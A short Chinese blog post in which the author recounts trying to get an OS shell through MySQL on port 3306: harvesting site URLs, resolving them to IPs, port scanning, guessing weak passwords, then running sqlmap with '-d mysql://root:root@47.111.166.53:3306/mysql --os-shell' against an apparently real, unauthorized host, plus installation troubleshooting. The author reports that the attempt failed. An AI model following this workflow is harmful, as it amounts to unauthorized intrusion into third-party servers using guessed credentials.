美文网首页
sqlmap拿3306的shell

sqlmap拿3306的shell

作者: 唐小风7 | 来源:发表于2019-08-08 11:27 被阅读0次

前提

首先采集网站url,然后通过url域名转化为ip,再通过端口扫描探测出想要的端口,比如3306

然后进行弱口令探测

然后我探测出某弱口令

拿shell

登上服务器,首先安装sqlmap

wget https://github.com/sqlmapproject/sqlmap/tarball/master

tar -zxvf master
cd sqlmapproject-sqlmap-de63238/
成功
python2 sqlmap.py -d "mysql://root:root@47.111.166.53:3306/mysql" -os-shell

提示报错


image.png

需要“python pymysql”第三方库

python2 -m pip install pymysql
报错

换了一台服务器 python2.6.6

python sqlmap.py -d "mysql://root:root@47.111.166.53:3306/mysql" -os-shell

先安装pip

curl https://bootstrap.pypa.io/2.6/get-pip.py -o get-pip.py
python get-pip.py
pip install pymysql

再次运行 还是不行


image.png

网上参考到直接github下载组件


组件

我直接本机安装 然后可以运行了 不过把MySQL服务判断为了oracle


orcale

....结局利用sqlmap拿shell失败

相关文章

  • sqlmap拿3306的shell

    前提 首先采集网站url,然后通过url域名转化为ip,再通过端口扫描探测出想要的端口,比如3306 然后进行弱口...

  • SQLmap交互式写shell

    使用sqlmap交互式写shell,只需网站绝对路径和一个注入点 【使用案例】 案例:SqlMap交互写Shell...

  • Vulnhub靶机:AI-Web-1.0

    标签:SQL注入、sqlmap写shell、反弹shell、写入passwd提权 0x00 环境准备 下载地址:h...

  • sqlmap使用操作

    安装好sqlmap后,可以用cmd使用sqlmap D: cd sqlmap/sqlmap python sqlm...

  • Docker笔记

    Docker搭建环境 MySql -p 3306:3306:将容器的 3306 端口映射到主机的 3306 端口。...

  • SQLMAP简介

    SQLMAP介绍 1.什么是SQLMAP? 2.SQLMAP能做什么? 3.SQLMAP目录介绍 什么是SQLMA...

  • .htaccess拿shell

    新建个 .htaccess文件内容: ForceType application/x-httpd-php SetH...

  • MySQL拿shell

    SHOW VARIABLES LIKE '%general%' set global general_log =...

  • sqlmap交互式写shell步骤大全

    根据上一篇文章手工注入getshell,再写一篇利用工具sqlmap写shell的文章,网上已经有很多类似的文章了...

  • 安全测试 sql注入 windows 实战

    1. sqlmap:http://sqlmap.org/[http://sqlmap.org/] 下载压缩包: 解...

网友评论

      本文标题:sqlmap拿3306的shell

      本文链接:https://www.haomeiwen.com/subject/eeytjctx.html